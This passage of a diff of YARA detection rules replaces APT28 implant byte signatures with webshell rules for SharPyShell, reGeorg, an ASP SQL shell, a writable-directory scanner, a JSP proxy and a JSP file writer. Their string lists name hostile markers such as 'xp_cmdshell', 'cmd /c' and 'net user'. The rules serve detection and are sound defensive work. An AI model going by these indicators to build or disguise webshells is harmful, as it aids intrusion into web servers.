+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5da9318d-f542-5603-a111-5b240f566d47"
+		date = "2021-01-11"
+		modified = "2023-04-05"
+		reference = "https://github.com/antonioCoco/SharPyShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5091-L5189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ebfedcec6f22d802a9980ad533f21e90b77fe929a813850be1b25304d3973c3b"
-		score = 85
-		quality = 85
+		hash = "e826c4139282818d38dcccd35c7ae6857b1d1d01"
+		hash = "e20e078d9fcbb209e3733a06ad21847c5c5f0e52"
+		hash = "57f758137aa3a125e4af809789f3681d1b08ee5b"
+		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
+		hash = "e44058dd1f08405e59d411d37d2ebc3253e2140385fa2023f9457474031b48ee"
+		hash = "f6092ab5c8d491ae43c9e1838c5fd79480055033b081945d16ff0f1aaf25e6c7"
+		hash = "dfd30139e66cba45b2ad679c357a1e2f565e6b3140a17e36e29a1e5839e87c5e"
+		hash = "89eac7423dbf86eb0b443d8dd14252b4208e7462ac2971c99f257876388fccf2"
+		hash = "8ce4eaf111c66c2e6c08a271d849204832713f8b66aceb5dadc293b818ccca9e"
+		logic_hash = "6699a44e396eedebb3bafa0e89c3b6d080586a158ed056ec7220bdf2ad764444"
+		score = 75
+		quality = 19
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = {C1 EB 07 8D ?? 01 32 1C ?? 33 D2 }
-		$STR2 = {2B ?? 83 ?? 06 0F 83 ?? 00 00 00 EB 02 33 }
-		$STR3 = {89 ?? ?? 89 ?? ?? 89 55 ?? 89 45 ?? 3B ?? 0F 83 ?? 00 00 00 8D
-         ?? ?? 8D ?? ?? FE }
+		$payload_reflection1 = "System" fullword nocase wide ascii
+		$payload_reflection2 = "Reflection" fullword nocase wide ascii
+		$payload_reflection3 = "Assembly" fullword nocase wide ascii
+		$payload_load_reflection1 = /[."']Load\b/ nocase wide ascii
+		$payload_load_reflection2 = /\bGetMethod\(("load|\w)/ nocase wide ascii
+		$payload_compile1 = "GenerateInMemory" nocase wide ascii
+		$payload_compile2 = "CompileAssemblyFromSource" nocase wide ascii
+		$payload_invoke1 = "Invoke" fullword nocase wide ascii
+		$payload_invoke2 = "CreateInstance" fullword nocase wide ascii
+		$payload_xamlreader1 = "XamlReader" fullword nocase wide ascii
+		$payload_xamlreader2 = "Parse" fullword nocase wide ascii
+		$payload_xamlreader3 = "assembly=" nocase wide ascii
+		$payload_powershell1 = "PSObject" fullword nocase wide ascii
+		$payload_powershell2 = "Invoke" fullword nocase wide ascii
+		$payload_powershell3 = "CreateRunspace" fullword nocase wide ascii
+		$rc_fp1 = "Request.MapPath"
+		$rc_fp2 = "<body><mono:MonoSamplesHeader runat=\"server\"/>" wide ascii
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_input4 = "\\u0065\\u0071\\u0075" wide ascii
+		$asp_input5 = "\\u0065\\u0073\\u0074" wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$sus_refl1 = " ^= " wide ascii
+		$sus_refl2 = "SharPy" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		(( filesize < 50KB and any of ( $sus_refl* ) ) or filesize < 10KB ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not any of ( $rc_fp* ) and ( ( all of ( $payload_reflection* ) and any of ( $payload_load_reflection* ) ) or ( all of ( $payload_compile* ) and any of ( $payload_invoke* ) ) or all of ( $payload_xamlreader* ) or all of ( $payload_powershell* ) )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V5 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_SQL : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "0e787116-d7f5-5a72-9aba-d4e6cb35bc8d"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L157-L171"
+		description = "ASP webshell giving SQL access. Might also be a dual use tool."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e534dcb9-40ab-544f-ae55-89fb21c422e9"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5191-L5372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0929b808f62e3c59c0afbe959ebf67a3a985e0a0a72bcb112c9693a98351555"
-		score = 85
-		quality = 85
+		hash = "216c1dd950e0718e35bc4834c5abdc2229de3612"
+		hash = "ffe44e9985d381261a6e80f55770833e4b78424bn"
+		hash = "3d7cd32d53abc7f39faed133e0a8f95a09932b64"
+		hash = "f19cc178f1cfad8601f5eea2352cdbd2d6f94e7e"
+		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
+		logic_hash = "c59250065c4be267746f716f922007b638706a76579af6509c8e97d0cee03f33"
+		score = 75
+		quality = -34
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33
-         C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00
-         00 00 48 8B CC E8}
+		$sql1 = "SqlConnection" fullword wide ascii
+		$sql2 = "SQLConnection" fullword wide ascii
+		$sql3 = "System" fullword wide ascii
+		$sql4 = "Data" fullword wide ascii
+		$sql5 = "SqlClient" fullword wide ascii
+		$sql6 = "SQLClient" fullword wide ascii
+		$sql7 = "Open" fullword wide ascii
+		$sql8 = "SqlCommand" fullword wide ascii
+		$sql9 = "SQLCommand" fullword wide ascii
+		$o_sql1 = "SQLOLEDB" fullword wide ascii
+		$o_sql2 = "CreateObject" fullword wide ascii
+		$o_sql3 = "open" fullword wide ascii
+		$a_sql1 = "ADODB.Connection" fullword wide ascii
+		$a_sql2 = "adodb.connection" fullword wide ascii
+		$a_sql3 = "CreateObject" fullword wide ascii
+		$a_sql4 = "createobject" fullword wide ascii
+		$a_sql5 = "open" fullword wide ascii
+		$c_sql1 = "System.Data.SqlClient" fullword wide ascii
+		$c_sql2 = "sqlConnection" fullword wide ascii
+		$c_sql3 = "open" fullword wide ascii
+		$sus1 = "shell" fullword nocase wide ascii
+		$sus2 = "xp_cmdshell" fullword nocase wide ascii
+		$sus3 = "aspxspy" fullword nocase wide ascii
+		$sus4 = "_KillMe" wide ascii
+		$sus5 = "cmd.exe" fullword wide ascii
+		$sus6 = "cmd /c" fullword wide ascii
+		$sus7 = "net user" fullword wide ascii
+		$sus8 = "\\x2D\\x3E\\x7C" wide ascii
+		$sus9 = "Hacker" fullword wide ascii
+		$sus10 = "hacker" fullword wide ascii
+		$sus11 = "HACKER" fullword wide ascii
+		$sus12 = "webshell" wide ascii
+		$sus13 = "equest[\"sql\"]" wide ascii
+		$sus14 = "equest(\"sql\")" wide ascii
+		$sus15 = { e5 bc 80 e5 a7 8b e5 af bc e5 }
+		$sus16 = "\"sqlCommand\"" wide ascii
+		$sus17 = "\"sqlcommand\"" wide ascii
+		$slightly_sus3 = "SHOW COLUMNS FROM " wide ascii
+		$slightly_sus4 = "show columns from " wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( 6 of ( $sql* ) or all of ( $o_sql* ) or 3 of ( $a_sql* ) or all of ( $c_sql* ) ) and ( ( filesize < 150KB and any of ( $sus* ) ) or ( filesize < 5KB and any of ( $slightly_sus* ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V6 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Scan_Writable : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "ffadb02f-6311-567d-900b-c8a9ed172ab4"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L173-L186"
+		description = "ASP webshell searching for writable directories (to hide more webshells ...)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1766e081-0591-59ab-b546-b13207764b4d"
+		date = "2021-03-14"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5374-L5517"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "93ce725a8af03d6f08eafe99ff3984e03a434b1f0071c6dbe560bafc3eefb576"
-		score = 85
-		quality = 85
+		hash = "2409eda9047085baf12e0f1b9d0b357672f7a152"
+		hash = "af1c00696243f8b062a53dad9fb8b773fa1f0395631ffe6c7decc42c47eedee7"
+		logic_hash = "80969fd0c27903dabf08a250a47971725ac5762fd2f9afd96167b8f88f277348"
+		score = 75
+		quality = -64
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F
-         ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F}
+		$scan1 = "DirectoryInfo" nocase fullword wide ascii
+		$scan2 = "GetDirectories" nocase fullword wide ascii
+		$scan3 = "Create" nocase fullword wide ascii
+		$scan4 = "File" nocase fullword wide ascii
+		$scan5 = "System.IO" nocase fullword wide ascii
+		$scan6 = "CanWrite" nocase fullword wide ascii
+		$scan7 = "Delete" nocase fullword wide ascii
+		$sus1 = "upload" nocase fullword wide ascii
+		$sus2 = "shell" nocase wide ascii
+		$sus3 = "orking directory" nocase fullword wide ascii
+		$sus4 = "scan" nocase wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		filesize < 10KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and 6 of ( $scan* ) and any of ( $sus* )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V7 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Regeorg : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "839041d9-e27b-52a2-b5d5-f1af595826f4"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L188-L208"
+		description = "Webshell regeorg JSP version"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cbb90005-d8f8-5c64-85d1-29e466f48c25"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "https://github.com/sensepost/reGeorg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5519-L5569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd65443065f044a2956ae51140423dab202effff5f12dd686f6c4fd54d8a4a0b"
-		score = 85
-		quality = 85
+		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
+		hash = "650eaa21f4031d7da591ebb68e9fc5ce5c860689"
+		hash = "00c86bf6ce026ccfaac955840d18391fbff5c933"
+		hash = "6db49e43722080b5cd5f07e058a073ba5248b584"
+		hash = "9108a33058aa9a2fb6118b719c5b1318f33f0989"
+		logic_hash = "9d4c60a4daaadf6cefe8bf1d84b1e4af491cd23136332db4a022715b265c8f4e"
+		score = 75
+		quality = 50
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = {10 A0 FA FD 83 3D 28 D4 1F FF 77 5? ?8 B4 50 CC 1E B0 78 D7 90 13
-         21 C0 23 3D 28 BC 78 95 DE 4B B0 60 00 00 0F 7F 38 B4 50 C8 D5 9F E0
-         25 DF F3 21 C0 28 BC 13 3D 2B 90 60 00 00 0F 7F 18 B4 50 C8 BC F2 21
-         C0 28 B4 5E 48 B5 5E 00 8D 41 FE 83 F8 06 8B 45 ?? 72 ?? 8B 4D ?? 8B }
-		$s2 = {28 D9 B0 00 00 00 00 FB 65 C0 AF E8 D3 40 28 B4 5? ?0 3C 20 FA FD
-         88 D7 A0 18 D4 2F F3 3D 2F 77 5? ?C 1E B0 78 BC 73 21 C0 A3 3D 2B 90
-         60 00 00 0F 7F 18 A4 D? ?8 B4 50 C8 0E 90 20 24 D? ?3 20 C0 28 B4 5?
-         ?3 3D 2F 77 5? ?8 B4 50 C2 20 C0 28 BD 70 2D 93 01 E8 B4 D0 C8 D4 2F
-         E3 B4 5E 88 B4 5? ?8 95 5? ?7 2A 05 F5 E5 B8 BE 55 DC 20 80 }
+		$jgeorg1 = "request" fullword wide ascii
+		$jgeorg2 = "getHeader" fullword wide ascii
+		$jgeorg3 = "X-CMD" fullword wide ascii
+		$jgeorg4 = "X-STATUS" fullword wide ascii
+		$jgeorg5 = "socket" fullword wide ascii
+		$jgeorg6 = "FORWARD" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		filesize < 300KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jgeorg* )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V9 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_HTTP_Proxy : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "41f46b52-4b0e-53ee-a86c-503fe9a9532c"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L210-L236"
+		description = "Webshell JSP HTTP proxy"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "55be246e-30a8-52ed-bc5f-507e63bbfe16"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5571-L5619"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5947dbb08c9d0851b7993e5ccf177f97dcb330d4b390833843f69932c921ce7a"
-		score = 85
-		quality = 85
+		hash = "2f9b647660923c5262636a5344e2665512a947a4"
+		hash = "97c1e2bf7e769d3fc94ae2fc74ac895f669102c6"
+		hash = "2f9b647660923c5262636a5344e2665512a947a4"
+		logic_hash = "7183902d43fc633db06a41b4a6bc02d2eb5662b7ee08080b57563783b8b67568"
+		score = 75
+		quality = 50
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89
-         45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4
-         33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2
-         F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6
-         8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE
-         3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8
-         0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33
-         C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02
-         C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F
-         02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01
-         FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B
-         45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33
-         D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45
-         E4 30 1C 01 8B 4D 0C }
+		$jh1 = "OutputStream" fullword wide ascii
+		$jh2 = "InputStream" wide ascii
+		$jh3 = "BufferedReader" fullword wide ascii
+		$jh4 = "HttpRequest" fullword wide ascii
+		$jh5 = "openConnection" fullword wide ascii
+		$jh6 = "getParameter" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and all of ( $jh* )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V10 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Writer_Nano : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "cb88ae0c-19e2-590c-9c13-78ac1dcc8c9f"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L238-L251"
+		description = "JSP file writer"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "422a18f2-d6d4-5b42-be15-1eafe44e01cf"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5621-L5702"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "62d47c1076b05bc9a531ef6e48f17f730932826b4b0f311887e3b14c639b937d"
-		score = 85
-		quality = 85
+		hash = "ac91e5b9b9dcd373eaa9360a51aa661481ab9429"
+		hash = "c718c885b5d6e29161ee8ea0acadb6e53c556513"
+		hash = "9f1df0249a6a491cdd5df598d83307338daa4c43"
+		hash = "5e241d9d3a045d3ade7b6ff6af6c57b149fa356e"
+		logic_hash = "44c11570c610b849ba9c7506fd9ef3575d270e79d7aaf5c26d54ab3f64cfc94f"
+		score = 75
+		quality = 48
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8]
-         48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01}
+		$payload1 = ".write" wide ascii
+		$payload2 = "getBytes" fullword wide ascii
+		$payload3 = ".decodeBuffer" wide ascii
+		$payload4 = "FileOutputStream" fullword wide ascii
+		$logger1 = "getLogger" fullword ascii wide
+		$logger2 = "FileHandler" fullword ascii wide
+		$logger3 = "addHandler" fullword ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$jw_sus1 = /getParameter\("."\)/ ascii wide
+		$jw_sus4 = "yoco" fullword ascii wide
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( any of ( $input* ) and any of ( $req* ) ) and ( filesize < 200 or ( filesize < 1000 and any of ( $jw_sus* ) ) ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( 2 of ( $payload* ) or all of ( $logger* ) )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V11 : FILE
